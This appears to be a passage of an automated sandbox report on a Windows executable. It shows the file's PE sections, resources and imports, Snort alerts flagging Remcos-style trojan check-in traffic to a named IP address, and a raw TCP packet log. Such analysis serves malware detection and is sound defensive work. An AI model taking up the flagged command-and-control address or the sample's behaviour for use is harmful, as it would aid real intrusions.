IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xff000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5df7c	0x5e000	False	0.528699509641	data	6.55764320265	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x5f000	0x47af4	0x47c00	False	0.249173154399	data	5.2159972367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0xa7000	0x53441	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xfb000	0x234c	0x2400	False	0.3623046875	data	4.99388267016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0xfe000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xff000	0x18	0x200	False	0.052734375	data	0.203013767787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x100000	0x6a90	0x6c00	False	0.62037037037	data	6.66625425433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x107000	0x12600	0x12600	False	0.194608312075	data	3.98030669674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x107b60	0x134	data
RT_CURSOR	0x107c94	0x134	data
RT_CURSOR	0x107dc8	0x134	data
RT_CURSOR	0x107efc	0x134	data
RT_CURSOR	0x108030	0x134	data
RT_CURSOR	0x108164	0x134	data
RT_CURSOR	0x108298	0x134	data
RT_BITMAP	0x1083cc	0x1d0	data
RT_BITMAP	0x10859c	0x1e4	data
RT_BITMAP	0x108780	0x1d0	data
RT_BITMAP	0x108950	0x1d0	data
RT_BITMAP	0x108b20	0x1d0	data
RT_BITMAP	0x108cf0	0x1d0	data
RT_BITMAP	0x108ec0	0x1d0	data
RT_BITMAP	0x109090	0x1d0	data
RT_BITMAP	0x109260	0x1d0	data
RT_BITMAP	0x109430	0x1d0	data
RT_BITMAP	0x109600	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x1096e8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x109b50	0x10a8	data	English	United States
RT_ICON	0x10abf8	0x25a8	data	English	United States
RT_ICON	0x10d1a0	0x94a8	data	English	United States
RT_DIALOG	0x116648	0x52	data
RT_STRING	0x11669c	0x270	data
RT_STRING	0x11690c	0x230	data
RT_STRING	0x116b3c	0x1d4	data
RT_STRING	0x116d10	0xec	data
RT_STRING	0x116dfc	0x320	data
RT_STRING	0x11711c	0xc8	data
RT_STRING	0x1171e4	0x100	data
RT_STRING	0x1172e4	0x238	data
RT_STRING	0x11751c	0x3f4	data
RT_STRING	0x117910	0x378	data
RT_STRING	0x117c88	0x3e8	data
RT_STRING	0x118070	0x234	data
RT_STRING	0x1182a4	0xec	data
RT_STRING	0x118390	0x1b4	data
RT_STRING	0x118544	0x3e4	data
RT_STRING	0x118928	0x358	data
RT_STRING	0x118c80	0x2b4	data
RT_RCDATA	0x118f34	0x10	data
RT_RCDATA	0x118f44	0x304	data
RT_RCDATA	0x119248	0x162	Delphi compiled form 'T__691894828'
RT_GROUP_CURSOR	0x1193ac	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x1193c0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x1193d4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x1193e8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x1193fc	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x119410	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x119424	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x119438	0x3e	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/07/21-18:17:02.843080	TCP	2032776	ET TROJAN Remocs 3.x Unencrypted Checkin	49707	49151	192.168.2.5	204.44.86.179
09/07/21-18:17:03.200734	TCP	2032777	ET TROJAN Remocs 3.x Unencrypted Server Response	49151	49707	204.44.86.179	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2021 18:16:40.805983067 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.823441982 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.823641062 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.848623991 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.866441965 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.871298075 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.871368885 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.871440887 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.925801992 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.943326950 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.943347931 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.943449020 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.958729029 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.975713968 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996124029 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996148109 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996165991 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996182919 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996196985 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996212006 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996213913 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996232033 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996237040 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996249914 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996268034 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996273041 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996301889 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996345043 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996728897 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996747971 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996764898 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996782064 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.996804953 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.996845961 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.997556925 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.997576952 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.997595072 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.997617960 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.997647047 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.997689962 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.998397112 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.998424053 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.998440981 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.998461008 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.998524904 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.998550892 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.999190092 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.999213934 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.999229908 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.999249935 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:40.999281883 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:40.999330044 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.000032902 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000057936 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000071049 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000093937 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000125885 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.000144958 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.000844955 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000865936 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000885010 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000888109 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.000907898 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.000915051 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.000972033 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.001048088 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.003463030 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013081074 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013103008 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013114929 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013128042 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013138056 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013173103 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013179064 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013411045 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013430119 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013447046 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013463974 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.013488054 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013506889 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.013514042 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.014241934 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.014259100 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.014280081 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.014288902 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.014300108 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.014309883 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.014329910 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.014345884 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.015038967 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015064955 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015083075 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015099049 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015129089 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.015151978 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.015888929 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015908003 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015923977 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015939951 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.015968084 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.015985012 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.016666889 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.016684055 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.016697884 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.016716957 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.016729116 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.016751051 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.016833067 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.017482996 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.017504930 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.017522097 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.017535925 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.017537117 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.017554998 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.017577887 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.018378019 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.018394947 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.018409014 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.018424988 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.018425941 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.018455982 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.018501043 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.019155025 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.019172907 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.019188881 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.019205093 CEST	443	49699	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.019208908 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.019244909 CEST	49699	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.020160913 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.021164894 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.021847010 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.038445950 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.038829088 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.038904905 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.039452076 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.043070078 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.056193113 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.059753895 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078547955 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078583956 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078623056 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078648090 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078695059 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078738928 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078743935 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.078767061 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078783989 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.078789949 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.078794003 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.078805923 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078844070 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078880072 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.078927040 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079092979 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.079263926 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079307079 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079338074 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079375982 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.079404116 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.079724073 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079765081 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079799891 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079828024 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.079844952 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.079866886 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.079910994 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.080385923 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.080424070 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.080472946 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.080518961 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.080521107 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.080537081 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.080611944 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.081209898 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.081248999 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.081276894 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.081289053 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.081294060 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.081329107 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.081343889 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.081401110 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.082022905 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.082065105 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.082103014 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.082134008 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.082142115 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.082170963 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.082195044 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:16:41.082880020 CEST	443	49700	162.159.135.233	192.168.2.5
Sep 7, 2021 18:16:41.083163023 CEST	49700	443	192.168.2.5	162.159.135.233
